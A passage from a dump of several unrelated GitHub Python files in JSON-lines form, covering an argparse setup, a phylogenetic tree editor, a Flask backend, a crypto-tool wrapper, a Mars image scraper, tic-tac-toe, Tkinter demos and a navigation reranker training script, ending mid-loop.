\tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import InnerNodesDifference. Default is False.\")\n parser.add_argument(\"@@LSCTC\",\t\tdest=\"lsctc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_costs import TreeComplexity. Default is False.\")\n parser.add_argument(\"@@LSPDC\",\t\tdest=\"lspdc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_pre import DictionaryCost. Default is False.\")\n parser.add_argument(\"@@LSDict\",\t\tdest=\"lsdict\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dictionary import DictionaryCost. Default is False.\")\n parser.add_argument(\"@@LSDictp\",\t\tdest=\"lsdictp\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dictionary_part import DictionaryCostPart. Default is False.\")\n parser.add_argument(\"@@LSDictbent\",\t\tdest=\"lsdictbent\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictBridgeEntities. Default is False.\")\n parser.add_argument(\"@@LSDictent\",\t\tdest=\"lsdictent\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictEntities. Default is False.\")\n parser.add_argument(\"@@LSDictpred\",\t\tdest=\"lsdictpred\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictPredicates. Default is False.\")\n parser.add_argument(\"@@LSFuzzypred\",\t\tdest=\"lsfuzzypred\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictFuzzyPredicates. Default is False.\")\n parser.add_argument(\"@@LSSempred\",\t\tdest=\"lssempred\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_predicates import SemprePredicates. Default is False.\")\n parser.add_argument(\"@@LSSempredfuzzy\",\tdest=\"lssempredfuzzy\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_predicates import SemprePredicatesFuzzy. Default is False.\")\n parser.add_argument(\"@@LSEnt\",\t\tdest=\"lsent\",\t\tnargs=2, default=[],\n\t\t help=\"from linguistics.similarity_qa import EntityLinkingCost. Default is False.\")\n parser.add_argument(\"@@LSBent\",\t\tdest=\"lsbent\",\t\tnargs=2, default=[],\n\t\t help=\"from linguistics.similarity_qa import BridgeLinkingCost. Default is False.\")\n parser.add_argument(\"@@LSPred\",\t\tdest=\"lspred\",\t\tnargs=2, default=[],\n\t\t help=\"from linguistics.similarity_qa import PredicateLinkingCost. Default is False.\")\n parser.add_argument(\"@@LSWildrecog\",\t\tdest=\"lswildrecog\",\tnargs='?', default=0.0,\n\t\t help=\"from linguistics.similarity_qa import UriSurfCost. Default is 0.0.\")\n parser.add_argument(\"@@LSRules\",\t\tdest=\"lsrules\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_rules import DictionaryRules. Default is False.\")\n parser.add_argument(\"@@LSLex\",\t\tdest=\"lslex\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_costs import LexicalSimilarity. Default is False.\")\n parser.add_argument(\"@@LSVari\",\t\tdest=\"lsvari\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import VariableDifferenceIndividual. Default is False.\")\n parser.add_argument(\"@@LSEnti\",\t\tdest=\"lsenti\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import EntityDifferenceIndividual. Default is False.\")\n parser.add_argument(\"@@LSVar\",\t\tdest=\"lsvar\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import VariableDifference. Default is False.\")\n parser.add_argument(\"@@LSEntDiff\",\t\tdest=\"lsentdiff\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import EntityDifference. Default is False.\")\n parser.add_argument(\"@@LSComp\",\t\tdest=\"lscomp\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import TreeDifferenceComplexity. Default is False.\")\n parser.add_argument(\"@@LSSize\",\t\tdest=\"lssize\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import TreeSize. Default is False.\")\n parser.add_argument(\"@@LSCount\",\t\tdest=\"lscount\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_qa import CountOp. Default is False.\")\n parser.add_argument(\"@@NoStrings\",\t\tdest=\"nostrings\",\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_logics import StringRulesInfiniteCost. Default is False.\")\n parser.add_argument(\"@@LSAlign\",\t\tdest=\"lsalign\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_align import AlignmentCost. Default is False.\")\n parser.add_argument(\"@@LSNP\",\t\tdest=\"lsnp\",\t\tnargs='*',\tdefault=0.0,\n\t\t help=\"from linguistics.similarity_qa import NounPhraseCost. Default is False.\")\n parser.add_argument(\"@@LSPNSP\",\t\tdest=\"lspnsp\",\t\tnargs='?',\ttype=float, default=[],\n\t\t help=\"from linguistics.similarity_pre import NoSimilarityPre. Default is False.\")\n parser.add_argument(\"@@LSNSQA\",\t\tdest=\"lsnsqa\",\t\tnargs='*',\tdefault=[],\n\t\t help=\"from linguistics.similarity_qa import NoSimilarityQA. Default is False.\")\n parser.add_argument(\"@@LSPHDWC\",\t\tdest=\"lsphdwc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import DistributedWordCost. Default is False.\")\n parser.add_argument(\"@@LSPHPC\",\t\tdest=\"lsphpc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import PhraseCost. Default is False.\")\n parser.add_argument(\"@@LSPHPCA\",\t\tdest=\"lsphpca\",\t\tnargs=3,\tdefault=[],\n\t\t help=\"from linguistics.similarity_phrases_ag import PhraseCost. Default is False.\")\n parser.add_argument(\"@@LSApprox\",\t\tdest=\"lsapprox\",\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_approx import ApproximateMatch. Default is False.\")\n parser.add_argument(\"@@LSFree\",\t\tdest=\"lsfree\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_freebase import EntityLinkingCost. Default is False.\")\n parser.add_argument(\"@@LSURISurf\",\t\tdest=\"lsurisurf\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_urisurf import URISurfCost. Default is False.\")\n parser.add_argument(\"@@LSBridge\",\t\tdest=\"lsbridge\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_bridge import BridgeCost. Default is False.\")\n parser.add_argument(\"@@LSPHNSP\",\t\tdest=\"lsphnsp\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import NoSimilarityPhrases. Default is False.\")\n parser.add_argument(\"@@LSPHLSP\",\t\tdest=\"lsphlsp\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases import LeafSimilarityPhrases. Default is False.\")\n parser.add_argument(\"@@LSPHPCAG\",\t\tdest=\"lsphpcag\",\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_phrases_ag import PhraseCostGuesser. Default is False.\")\n parser.add_argument(\"@@LSPHPCG\",\t\tdest=\"lsphpcg\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n help=\"from linguistics.similarity_phrases import PhraseCostGuesser. Default is False.\")\n\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.WARNING)\n\n ruleExtractor = ExtractorParser(args)\n ruleExtractor.run()\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n traceback.print_exc(file=sys.stderr)\n sys.exit(255)\n","repo_name":"pasmargo/t2t-qa","sub_path":"alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":29258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"18462497000","text":"import re\nimport string\nfrom random import choice\n\nfrom newick import dumps\n\nfrom actions import ask_if_finished, get_integer\nfrom phylogenetic_trees.trees import PhyTree\n\n\ndef modify(file_name: str, tree: PhyTree):\n finished = False\n while not finished:\n print(\"Tree has following groups:\")\n print(tree.get_nodes())\n print(\"Add leaf:\")\n node = input()\n if re.match(r\"[{} ]\", node):\n print(\"Leaf name can not include {, }, and space\")\n continue\n print(f\"Add leaf '{node}' to group:\")\n group = input()\n if not re.match(r'[{}]', group):\n print(\"Target group has to be enclosed by {} brackets\")\n continue\n current_structure = dumps(tree.get_newick())\n try:\n tree.add_to_group(node, group)\n except ValueError as e:\n print(e)\n tree.parse_string(current_structure)\n finished = ask_if_finished()\n tree.save(file_name)\n\n\ndef create(file_name: str):\n tree = PhyTree()\n modify(file_name, tree)\n\n\ndef update(file_name: str):\n tree = PhyTree()\n tree.load_file(file_name)\n modify(file_name, tree)\n\n\ndef random_tree(file_name: str, leaves_num: int = 0):\n if leaves_num == 0:\n print(\"Number of leaves:\")\n leaves_num = get_integer()\n\n leaves_queue = string.ascii_uppercase[:leaves_num]\n\n tree = PhyTree()\n for l in leaves_queue:\n available_nodes = list(filter(lambda n: re.match(r\"{[a-zA-Z0-9]*}\", n), tree.get_nodes()))\n chosen_node = choice(available_nodes)\n tree.add_to_group(l, chosen_node)\n\n tree.save(file_name)\n","repo_name":"NightCrawler96/Kalkulator-drzew-filogenetycznych","sub_path":"actions/create_tree.py","file_name":"create_tree.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31804407424","text":"from api.api import api\nfrom api.config import app_config\nfrom api.forex_models import db\nfrom api.model_handler import DbUtils\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom loguru import logger\nimport os\n\ndef create_app(config_name):\n \"\"\"\n\n :param config:\n :return:\n \"\"\"\n logger.info(f\"Setting up flask backend for {config_name}\")\n web_app = Flask(__name__, instance_relative_config=True)\n CORS(web_app)\n config=app_config[config_name]\n web_app.config.from_object(config)\n register_extensions(web_app)\n DbUtils.recreate_db(config.SQLALCHEMY_DATABASE_URI)\n logger.info(\"Flask backend successfully created\")\n return web_app\n\n\ndef register_extensions(web_app):\n \"\"\"\n\n :param web_app:\n :return:\n \"\"\"\n logger.info(\"Registering extensions\")\n api.init_app(web_app)\n db.init_app(web_app)\n logger.info(\"Extensions registered\")\n\n\n# Loguru function, centralizes logging and provides better exceptions\n#with logger.catch():\nif __name__ == '__main__':\n config_name = os.environ.get(\"APP_ENVIRONMENT\")\n app = create_app(config_name)\n app.run(host='0.0.0.0', port=80, threaded=True)\n","repo_name":"paul-armstrong-dev/ebury_trader","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28448796385","text":"#!/usr/bin/python\nimport sys\nimport os\nimport subprocess\nimport time\nimport select\n\n\ndef main():\n print(\"--- Cryptomotor v1.0 ---\")\n print(\"Selecciona una de las opciones\")\n print(\"1.--> Generar nuevas claves de encriptacion\")\n print(\"2.--> Encriptar un documento\")\n print(\"3.--> Descencriptar un documento\")\n print(\"4.--> Firmar un documento\")\n print(\"5.--> Verificar un documento\")\n print(\"otro --> Salir\")\n argumento = input()\n if (argumento == \"1\"):\n callCryptoMotor()\n elif (argumento == \"4\"):\n callHashFunction(\"../hcryptomotor/test/testfiles/test.pdf\")\n\ndef callCryptoMotor():\n subprocess.run([\"../hcryptomotor/.stack-work/install/x86_64-linux-tinfo6/0ede982d3f8e41d7cefbca13c6f922878b5a782887477c6d0108f39e91a3b7a1/8.10.7/bin/hcryptomotor-genkey\"])\n print(\"LLaves generadas con exito\")\n return 0\n\ndef callHashFunction(filepath):\n callhash = subprocess.Popen([\"../hcryptomotor/bins/sha384sum\", filepath], stdout=subprocess.PIPE)\n handler = select.poll()\n handler.register(callhash.stdout, select.POLLIN)\n hashString = callhash.stdout.readline()\n getHashFromString(hashString)\n\ndef getHashFromString(hashString):\n hash = hashString.split()\n print(str(hash[0] == \"1\"))\n\n\n\nmain()\n","repo_name":"kaledcorona/Hermes","sub_path":"Cryptomotor/pwrapper/cryptomotor.py","file_name":"cryptomotor.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4576975176","text":"#!/usr/bin/env python\n\nimport sys\nimport couchdb\nfrom htsint.database import Couch\nfrom htsint import __basedir__\nsys.path.append(__basedir__)\ntry:\n from configure import CONFIG\nexcept:\n CONFIG = {'dbhost':'localhost','dbport':'5984'}\n\n#class HtsDb(Couch):\n# \"\"\"\n# A generic class\n# \"\"\"\n\n\nclass HtsDb(object):\n\n def __init__(self):\n \"\"\" \n initialize class to handle several couchdbs \n \"\"\"\n\n self.dbnames = ['htsint-uniprot','htsint-gene','htsint-go','htsint-taxa']\n self.db = {}\n self.server = couchdb.Server(\"http://%s:%s/\"%(CONFIG['dbhost'],CONFIG['dbport']))\n \n def connect(self):\n \"\"\"\n connect to the htsint specific databases\n \"\"\"\n\n for dbname in self.dbnames:\n self.db[dbname] = self.server[dbname]\n\n def save_doc(self,dbname,doc):\n \"\"\"\n save a document into a database\n \"\"\"\n\n self.db[dbname].save(doc)\n\n# If your CouchDB server is running elsewhere, set it up like this:\n#couch = couchdb.Server('http://example.com:5984/')\n\n# select database\n#db = couch['mydb']\n\n#create a document and insert it into the db:\n#doc = {'foo': 'bar'}\n#db.save(doc)\n","repo_name":"ajrichards/htsint","sub_path":"htsint/database/old/HtsDb.py","file_name":"HtsDb.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"29645703881","text":"#!/usr/bin/python\n\n\"\"\"\ncisco_neighbor_handlers_ut contains unit tests for functions in the\ncisco_neighbor_handlers library\n\"\"\"\n\n\n# Built-In Libraries\nimport os\nimport sys\nimport json\nimport logging\nimport argparse\nfrom builtins import input\n\n# Autoshell Libraries\nfor each in os.walk(os.path.pardir):\n sys.path.append(each[0])\nimport autoshell.cisco.neighbors.handlers as handlers\n\nlog = logging.getLogger(\"modules\")\nconsoleHandler = logging.StreamHandler()\nfmt = \"\"\"\\\n%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\"\"\"\nformat = logging.Formatter(fmt)\nconsoleHandler.setFormatter(format)\nlog.addHandler(consoleHandler)\nlog.setLevel(logging.DEBUG)\n\n\ndef multilineinput(ending):\n result = \"\"\n done = False\n while not done:\n data = input()\n if data == ending:\n done = True\n else:\n result += data+\"\\n\"\n return result\n\n\nclass fake_host:\n def send_command(self, command):\n log.info(\"test_cisco_ios_neighbor_handler:\\\n Input '%s' output\\\n ending with '^' on a line by itself\" % command)\n return multilineinput(\"^\")\n\n\ndef test_cisco_ios_neighbor_handler():\n host = fake_host()\n data = handlers.cisco_ios_neighbor_handler(host)\n log.info(\"Result:\\n%s\" % json.dumps(data, indent=4))\n\n\ndef run_tests(args):\n if args.test_cisco_ios_neighbor_handler:\n test_cisco_ios_neighbor_handler()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='AutoShell - Module Library Test Suite')\n parser.add_argument(\n '-c', \"--test_cisco_ios_neighbor_handler\",\n help=\"Run test_cisco_ios_neighbor_handler\",\n dest=\"test_cisco_ios_neighbor_handler\",\n action='store_true')\n args = parser.parse_args()\n run_tests(args)\n","repo_name":"PackeTsar/autoshell","sub_path":"tests/cisco_neighbors_handlers_ut.py","file_name":"cisco_neighbors_handlers_ut.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"3337522639","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Import Splinter and BeautifulSoup\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nfrom webdriver_manager.chrome import ChromeDriverManager\n# Need to use Pandas' read_html() function.\nimport pandas as pd\n\n\n# In[2]:\n\n\n# Create ChromeDriver executable path.\nexecutable_path = {'executable_path': ChromeDriverManager().install()}\nbrowser = Browser('chrome', **executable_path, headless=False)\n\n\n# ### Scrape the news data.\n\n# In[3]:\n\n\n# Visit the URL.\nurl = 'https://redplanetscience.com'\nbrowser.visit(url)\n# Optional delay for loading the page.\nbrowser.is_element_present_by_css('div.list_text', wait_time=1)\n\n\n# In[4]:\n\n\n# Set up HTML parser.\nhtml = browser.html\nnews_soup = soup(html, 'html.parser')\nslide_elem = news_soup.select_one('div.list_text')\n\n\n# In[5]:\n\n\n# Find the data from the slide_elem - content title.\nnews_title = slide_elem.find('div', class_='content_title').get_text()\nnews_title\n\n\n# In[6]:\n\n\n# Find the paragraph text from the slide_elem.\nnews_p = slide_elem.find('div', class_='article_teaser_body').get_text()\nnews_p\n\n\n# ### Scrape the image.\n\n# In[7]:\n\n\n# Visit the URL.\nurl = 'https://spaceimages-mars.com'\nbrowser.visit(url)\n\n\n# In[8]:\n\n\n# Find and click the \"Full Image\" button.\nfull_image_elem = browser.find_by_tag('button')[1]\nfull_image_elem.click()\n\n\n# In[9]:\n\n\n# New webpage means we have to parse the HTML again.\nhtml = browser.html\nimg_soup = soup(html, 'html.parser')\n\n\n# In[10]:\n\n\n# Find the relative image url (ever-changing).\nimg_url_rel = img_soup.find('img', class_='fancybox-image').get('src')\nimg_url_rel\n\n\n# In[11]:\n\n\n# Use the base URL to create an absolute URL.\nimg_url = f'https://spaceimages-mars.com/{img_url_rel}'\nimg_url\n\n\n# ### Scrape table of data.\n\n# In[12]:\n\n\n# Read the data from the website, store the first table element as a DataFrame\ndf = pd.read_html('https://galaxyfacts-mars.com')[0]\n# Name the columns in the new DF.\ndf.columns = ['description', 'Mars', 'Earth']\n# Set the index to the different categories/descriptors.\ndf.set_index('description', inplace=True)\ndf\n\n\n# In[13]:\n\n\n# View the DataFrame as HTML.\ndf.to_html()\n\n\n# # D1: Scrape High-Resolution Mars’ Hemisphere Images and Titles\n\n# In[14]:\n\n\n# 1. Use browser to visit the URL \nurl = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\nbrowser.visit(url)\n\n\n# In[15]:\n\n\n# 2. Create a list to hold the images and titles.\nhemisphere_image_urls = []\n\n# 3. Write code to retrieve the image urls and titles for each hemisphere.\n# Parse the html.\nhtml = browser.html\npage_soup = soup(html, 'html.parser')\n\n# Find all the \nimage_divs = page_soup.find_all('div', class_='description')\nfor image in image_divs:\n #Create empty dictionary to store title and URL.\n hemisphere_dict = {}\n \n # Get the title of the image.\n title = image.find('h3').text\n \n # Create the URL to access the page with the HD image, and visit it.\n create_url = f\"https://astrogeology.usgs.gov{image.find('a').get('href')}\"\n browser.visit(create_url)\n \n # Parse the image webpage.\n image_page_soup = soup(browser.html, 'html.parser')\n \n # Get the url of the image, combine into a full URL.\n full_res_url = image_page_soup.find('div', class_='downloads').find('a').get('href')\n\n # Populate the dictionary and add it to the main list.\n hemisphere_dict['img_url'] = full_res_url\n hemisphere_dict['title'] = title\n hemisphere_image_urls.append(hemisphere_dict)\n\n\n# In[16]:\n\n\n# 4. Print the list that holds the dictionary of each image url and title.\nhemisphere_image_urls\n\n\n# In[17]:\n\n\n# 5. Quit the browser\nbrowser.quit()\n\n","repo_name":"SDCoulter/Mission-to-Mars","sub_path":"Mission_to_Mars_Challenge.py","file_name":"Mission_to_Mars_Challenge.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27958576227","text":"import random\ndef printBoard(board):\n print(board[0] + '|' + board[1] + '|' + board[2])\n print('-+-+-')\n print(board[3] + '|' + board[4] + '|' + board[5])\n print('-+-+-')\n print(board[6] + '|' + board[7] + '|' + board[8])\n print()\n print()\n\ndef win(board):\n if (board[0] == board[1] == board[2]):\n return (board[0]== 'x' or board[0] == 'o')\n if (board[3] == board[4] == board[5]):\n return (board[3] == 'x' or board[3] == 'o')\n if (board[6] == board[7] == board[8]):\n return (board[6] == 'x' or board[6] == 'o')\n if (board[0] == board[3] == board[6]):\n return (board[0][0] == 'x' or board[0] == 'o')\n if (board[1] == board[4] == board[7]):\n return (board[1] == 'x' or board[1] == 'o')\n if (board[2] == board[5] == board[8]):\n return (board[2] == 'x' or board[2] == 'o')\n if (board[0] == board[4] == board[8]):\n return (board[0] == 'x' or board[0] == 'o')\n if (board[2] == board[4] == board[6]):\n return (board[2] == 'x' or board[2] == 'o')\n return False\n\ndef move (board,player,position):\n board[position]= player\n return board\n\ndef position():\n print('Ingrese una posición donde desea colocar su pieza')\n position = int(input())\n return position\n\ndef autoposition(board):\n return random.choice(positionToChoose(board))\n\ndef positionToChoose(board):\n positionToChoose = []\n for index in range(len(board)):\n if (board[index] == ' '):\n positionToChoose.append(index)\n return positionToChoose\n\ndef choosePiece():\n print('Elija el tipo de pieza a utilizar para el jugador 1')\n player1 = input()\n return player1\n\ndef oposite(player1):\n if player1 == 'o' :\n return 'x'\n else:\n return 'o'\n\ndef play(player1,player2,round,board):\n state = 'Usted ha Empatado'\n for round in range(1,9):\n if (round % 2 == 0):\n board = move(board,player2,autoposition(board))\n else :\n board = move(board,player1,position())\n printBoard(board)\n if(win(board)):\n state = win_or_loose(round)\n break\n return state\n\ndef win_or_loose(result):\n if (result % 2 == 0):\n return 'Usted ha perdido'\n else:\n return 'Usted ha ganado'\ndef game():\n player1 = choosePiece()\n player2 = oposite(player1)\n board = [' ',' ',' ',' ',' ',' ',' ',' ',' ']\n result = play(player1,player2,round,board)\n print(result)\ngame()","repo_name":"fedemozzon/Ta-Te-Ti","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20046175325","text":"'''from Tkinter import *\nimport tkMessageBox\nimport Tkinter\n\ntop = Tkinter.Tk()\n\nCheckVar1 = IntVar()\nCheckVar2 = IntVar()\nC1 = Checkbutton(top, text = \"Music\", variable = CheckVar1, \\\n onvalue = 1, offvalue = 0, height=5, \\\n width = 20)\nC2 = Checkbutton(top, text = \"Video\", variable = CheckVar2, \\\n onvalue = 1, offvalue = 0, height=5, \\\n width = 20)\nC1.pack()\nC2.pack()\ntop.mainloop()\n\n\nfrom Tkinter import *\nclass App(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n\n\n# create the application\nmyapp = App()\n\n#\n# here are method calls to the window manager class\n#\nmyapp.master.title(\"My Do-Nothing Application\")\nmyapp.master.minsize(400,50)\nmyapp.master.maxsize(1000, 400)\n\n# start the program\nmyapp.mainloop()\nmyapp.destroy()\n\n'''\n\nfrom Tkinter import *\n\nm1 = PanedWindow()\nm1.pack(fill=BOTH, expand=1)\n\nleft = Label(m1, text=\"left pane\")\nm1.add(left)\n\nm2 = PanedWindow(m1, orient=VERTICAL)\nm1.add(m2)\n\ntop = Label(m2, text=\"top pane\")\nm2.add(top)\n\nbottom = Label(m2, text=\"bottom pane\")\nm2.add(bottom)\n\nmainloop()","repo_name":"rjjanney/searchGFX2","sub_path":"Tkinter_Test.py","file_name":"Tkinter_Test.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37271904922","text":"from env import R2RBatch\nfrom refer360_env import Refer360Batch\nfrom utils import Tokenizer, read_vocab\nfrom vocab import TRAIN_VOCAB\nfrom train import make_arg_parser\nfrom utils import get_arguments\nfrom pprint import pprint\nimport os\narg_parser = make_arg_parser()\narg_parser.add_argument('--cache_path', type=str,\n required=True)\nargs = get_arguments(arg_parser)\nvocab = read_vocab(TRAIN_VOCAB, args.language)\ntok = Tokenizer(vocab)\n\nif args.env == 'r2r':\n EnvBatch = R2RBatch\nelif args.env in ['refer360']:\n EnvBatch = Refer360Batch\nif args.prefix in ['refer360', 'r2r', 'R2R', 'REVERIE', 'r360tiny', 'RxR_en-ALL']:\n val_splits = ['val_unseen', 'val_seen']\n target = 'val_unseen'\nelif args.prefix in ['touchdown', 'td']:\n val_splits = ['dev']\n target = 'dev'\n\nenv = EnvBatch(['none'],\n splits=['train'] + val_splits,\n tokenizer=tok,\n args=args)\nif args.env == 'r2r':\n error_margin = 3.0\nelif args.env in ['refer360']:\n error_margin = env.distances[0][1] * (2**0.5) + 1\n\n\nimport torch\nimport torch.nn as nn\nimport json\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\n\nclass Net(nn.Module):\n def __init__(self, input_dim):\n super(Net, self).__init__()\n if args.env == 'r2r':\n self.net = nn.Sequential(\n nn.BatchNorm1d(input_dim),\n nn.Linear(input_dim, input_dim),\n nn.BatchNorm1d(input_dim),\n nn.Tanh(),\n nn.Linear(input_dim, 1)\n )\n elif args.env == 'refer360':\n self.net = nn.Sequential(\n nn.Linear(input_dim, input_dim),\n nn.Tanh(),\n nn.Linear(input_dim, 1)\n )\n else:\n raise NotImplementedError()\n\n def forward(self, x):\n\n x = self.net(x).squeeze(-1)\n return x\n\n\ndef average(_l):\n return float(sum(_l)) / len(_l)\n\n\ndef count_prefix_len(l1, l2):\n res = 0\n while(res < len(l1) and res < len(l2) and l1[res] == l2[res]):\n res += 1\n return res\n\n\ndef get_path_len(scanId, path):\n path_len = 0\n prev = path[0]\n for curr in path[1:]:\n if args.env == 'r2r':\n distance = env.distances[scanId][prev][curr]\n elif args.env == 'refer360':\n distance = env.distances[prev][curr]\n else:\n raise NotImplementedError()\n path_len += distance\n\n\ndef load_data(filenames, split_names):\n all_data = {}\n for fn in filenames:\n\n split = ''\n for split_name in split_names:\n if split_name in fn:\n split = split_name\n break\n assert split != ''\n\n with open(fn, 'r') as f:\n train_file = json.loads(f.read())\n train_instrs = list(train_file.keys())\n train_data = {}\n\n for instr_id in train_instrs:\n path_id = instr_id.split('_')[0]\n scanId = env.gt[path_id]['scan']\n new_data = {\n 'instr_id': instr_id,\n 'candidates': [],\n 'candidates_path': [],\n 'reranker_inputs': [],\n 'distance': [],\n 'gt': env.gt[path_id],\n 'gold_idx': -1,\n 'goal_viewpointId': env.gt[path_id]['path'][-1],\n 'gold_len': get_path_len(scanId, env.gt[path_id]['path']),\n }\n self_len = 0\n for i, candidate in enumerate(train_file[instr_id]):\n _, world_states, actions, sum_logits, mean_logits, sum_logp, mean_logp, pm, speaker, scorer = candidate\n new_data['candidates'].append(candidate)\n new_data['candidates_path'].append([ws[1] for ws in world_states])\n new_data['reranker_inputs'].append(\n [len(world_states), sum_logits, mean_logits, sum_logp, mean_logp, pm, speaker] * 4)\n\n if args.env == 'r2r':\n distance = env.distances[scanId][world_states[-1]\n [1]][new_data['goal_viewpointId']]\n elif args.env == 'refer360':\n distance = env.distances[world_states[-1]\n [1]][new_data['goal_viewpointId']]\n else:\n raise NotImplementedError()\n\n new_data['distance'].append(distance)\n my_path = [ws[1] for ws in world_states]\n if my_path == env.gt[path_id]['path']:\n new_data['gold_idx'] = i\n\n new_data['self_len'] = self_len\n train_data[instr_id] = new_data\n\n print(fn)\n print('gold', average([d['gold_idx'] != -1 for d in train_data.values()]))\n print('oracle', average(\n [any([dis < error_margin for dis in d['distance']]) for d in train_data.values()]))\n all_data[split] = train_data\n\n return all_data\n\n\ncache_list = []\nfor _f in os.listdir(args.cache_path):\n if 'json' not in _f or 'cache' not in _f:\n continue\n cache_file = os.path.join(args.cache_path, _f)\n cache_list.append(cache_file)\n\nprint('Cache list\\n')\nprint('\\n'.join(cache_list))\ndata_splits = load_data(cache_list, ['train'] + val_splits)\n\nnet = Net(28).cuda()\n\nbatch_labels = []\nvalid_points = 0\n\nfor training_point in data_splits['train'].values():\n labels = training_point['distance']\n gold_idx = np.argmin(labels)\n ac_len = len(labels)\n choice = 1\n x_1 = []\n x_2 = []\n if choice == 1:\n for i in range(ac_len):\n for j in range(ac_len):\n if labels[i] <= error_margin and labels[j] > error_margin:\n x_1.append(i)\n x_2.append(j)\n valid_points += 1\n else:\n for i in range(ac_len):\n if labels[i] > error_margin:\n x_1.append(gold_idx)\n x_2.append(i)\n valid_points += 1\n batch_labels.append((x_1, x_2))\n\nprint(valid_points)\n\n\nx_1 = []\nx_2 = []\noptimizer = optim.SGD(net.parameters(), lr=0.00005, momentum=0.6)\nbest_performance = 0.0\nfor epoch in range(30): # loop over the dataset multiple times\n epoch_loss = 0\n for i, (instr_id, training_point) in enumerate(data_splits['train'].items()):\n inputs = training_point['reranker_inputs']\n labels = training_point['distance']\n ac_len = len(labels)\n\n inputs = torch.stack([torch.Tensor(r) for r in inputs]).cuda()\n labels = torch.Tensor(labels)\n\n scores = net(inputs)\n\n if i % 10 == 0 and len(x_1):\n x1 = torch.cat(x_1, 0)\n x2 = torch.cat(x_2, 0)\n loss = F.relu(1.0 - (x1 - x2)).mean()\n #s = x1-x2\n #loss = (-s + torch.log(1 + torch.exp(s))).mean()\n loss.backward()\n epoch_loss += loss.item()\n optimizer.step()\n optimizer.zero_grad()\n x_1 = []\n x_2 = []\n\n if len(batch_labels[i][0]) > 0:\n 